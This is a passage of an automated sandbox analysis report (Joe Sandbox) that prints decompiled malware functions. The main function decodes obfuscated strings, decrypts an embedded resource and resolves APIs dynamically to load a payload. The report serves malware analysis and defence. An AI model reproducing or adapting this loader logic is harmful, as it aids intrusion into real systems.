GetTickCount.KERNEL32 ref: 00B8A59B

Part of subcall function 00B76DA4: __getptd.LIBCMT ref: 00B76DA9

_rand.LIBCMT ref: 00B8A5C4

Part of subcall function 00B76DB6: __getptd.LIBCMT ref: 00B76DB6

wsprintfA.USER32 ref: 00B8A5E0

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
String ID:
API String ID: 2840978672-0
Opcode ID: fdd1637222be69be393d59fd44db29ff8ee23b394cbe063ff966af074eed1a55
Instruction ID: e9506614729d7c1f4ffa3a4b743c11d4ad42e16ad7ce8f3c50d0f232c8ee4afc
Opcode Fuzzy Hash: fdd1637222be69be393d59fd44db29ff8ee23b394cbe063ff966af074eed1a55
Instruction Fuzzy Hash: D50171B0D04108EBDB00EF98C985B9DBBF5AF59301F1080D5E50997351D730AE50CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A890, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8A890(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v17;
				intOrPtr _v24;

				_v8 = E00B72D10(_a4, _a8);
				if(_v8 != 0) {
					E00B76C80(0xba2ad0, _a4, _v8 - _a4);
					 *(_v8 - _a4 + 0xba2ad0) = 0;
					_v12 = _a8;
					_v16 = _v12 + 1;
					do {
						_v17 =  *_v12;
						_v12 = _v12 + 1;
					} while (_v17 != 0);
					_v24 = _v12 - _v16;
					wsprintfA(_v8 - _a4 + 0xba2ad0, "%s%s", _a12, _v8 + _v24);
					return 0xba2ad0;
				}
				return _a4;
			}

0x00b8a8a6
0x00b8a8ad
0x00b8a8c4
0x00b8a8d2
0x00b8a8dc
0x00b8a8e5
0x00b8a8e8
0x00b8a8ed
0x00b8a8f0
0x00b8a8f4
0x00b8a900
0x00b8a91f
0x00000000
0x00b8a928
0x00000000

APIs

_strncpy.LIBCMT ref: 00B8A8C4
wsprintfA.USER32 ref: 00B8A91F

Strings

%s%s, xrefs: 00B8A90E

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _strncpywsprintf
String ID: %s%s
API String ID: 782160923-3252725368
Opcode ID: 01c62edc6dfcf51bd7ae9214e8794be91ebaab2b0b14a2470ee8bc8a56d2de69
Instruction ID: 88d6eba5bd21bb7301ab27af8a8aaf81af1b33ed9146e5c56613a2cbf0280bdb
Opcode Fuzzy Hash: 01c62edc6dfcf51bd7ae9214e8794be91ebaab2b0b14a2470ee8bc8a56d2de69
Instruction Fuzzy Hash: DA21F375E04208EFDF10DFACC985AADBBB4EF45308F148198E909AB341D631AB90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B95B1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00B95B1A(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00B955DA(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00B7844B(__edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00B7844B(__edx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00B955B3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00B958B2(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x00b95b1a
0x00b95b1d
0x00b95b23
0x00b95b31
0x00b95b37
0x00b95b3f
0x00b95b4b
0x00b95b53
0x00b95b5b
0x00b95b6f
0x00b95b71
0x00b95b75
0x00b95b7a
0x00b95b80
0x00b95b82
0x00b95b84
0x00b95b87
0x00000000
0x00b95b8e
0x00b95b82
0x00b95b75
0x00b95b6f
0x00b95b5b
0x00b95b8f

APIs

Part of subcall function 00B955DA: __getptd.LIBCMT ref: 00B955E0
Part of subcall function 00B955DA: __getptd.LIBCMT ref: 00B955F0

__getptd.LIBCMT ref: 00B95B29

Part of subcall function 00B7844B: __getptd_noexit.LIBCMT ref: 00B7844E
Part of subcall function 00B7844B: __amsg_exit.LIBCMT ref: 00B7845B

__getptd.LIBCMT ref: 00B95B37

Strings

csm, xrefs: 00B95B45

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b090dfe5f21444ebe96cc3612473875d20e543155f48515c06891e9399b454ec
Instruction ID: e8d12b219ff6f0864c0f4898dd49a8a36b0481f61138d30724bf8adcadfc4b0b
Opcode Fuzzy Hash: b090dfe5f21444ebe96cc3612473875d20e543155f48515c06891e9399b454ec
Instruction Fuzzy Hash: 74014B35881A058ECF36AFA4C484ABDB3F5FF14321F2454BEE54656651CF309981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B8ABD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B8ABD0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v186;
				char _v188;
				signed int _t9;
				char* _t15;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;

				_t23 = __esi;
				_t22 = __edi;
				_t17 = __ebx;
				_t9 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t9 ^ _t24;
				_v188 = 0;
				E00B791C0( &_v186, 0, 0xa8);
				_t21 =  &_v188;
				_v8 =  *0xba27d0( &_v188, 0x55);
				if(_v8 != 0) {
					_t15 = E00B8A160( &_v188);
				} else {
					_t15 = "Unknown";
				}
				return E00B74354(_t15, _t17, _v12 ^ _t24, _t21, _t22, _t23);
			}

0x00b8abd0
0x00b8abd0
0x00b8abd0
0x00b8abd9
0x00b8abe0
0x00b8abe5
0x00b8abfa
0x00b8ac04
0x00b8ac11
0x00b8ac18
0x00b8ac2a
0x00b8ac1a
0x00b8ac1a
0x00b8ac1a
0x00b8ac3f

APIs

_memset.LIBCMT ref: 00B8ABFA
GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 00B8AC0B

Strings

Unknown, xrefs: 00B8AC1A

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: DefaultLocaleNameUser_memset
String ID: Unknown
API String ID: 3917531957-1654365787
Opcode ID: e7dd43bfaa43a050bb5b6d5b21bc24c278d409f748934e6a69dc88a1e609c0d4
Instruction ID: 5e8188b4195d5dc6b4e7b5ca384d64e3155be66914e42e15aaa64b4ebc25fb70
Opcode Fuzzy Hash: e7dd43bfaa43a050bb5b6d5b21bc24c278d409f748934e6a69dc88a1e609c0d4
Instruction Fuzzy Hash: CAF06271D4030C9BDB50FB64EC467AD73B8DB14701F4084E9A409A7291EB355A48CB43

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dll.exe PID: 5360 Parent PID: 5860 dll.exeCOMMON

Executed Functions

Function 00007FFC0895000A, Relevance: .8, Instructions: 765COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.304760194.00007FFC08950000.00000040.00000001.sdmp, Offset: 00007FFC08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffc08950000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa006ca0dd5418b511080abfad000ae406c0fba9a098556d8f973af2391004cb
Instruction ID: dfe57f84dc7bda5d6208b8b69a3723579de9baecc8061e4b462bab3f4ca3cdee
Opcode Fuzzy Hash: aa006ca0dd5418b511080abfad000ae406c0fba9a098556d8f973af2391004cb
Instruction Fuzzy Hash: 8EA14D7090D6AD8FDB45EB68C8A57A9BBB1EF46300F1444BAD04DD72D3CE396885CB21

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: chormuimii.exe PID: 3556 Parent PID: 5860 chormuimii.exeCOMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	0.2%
Signature Coverage:	3.7%
Total number of Nodes:	1233
Total number of Limit Nodes:	45

Executed Functions

Function 004019F0, Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40)); // executed
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
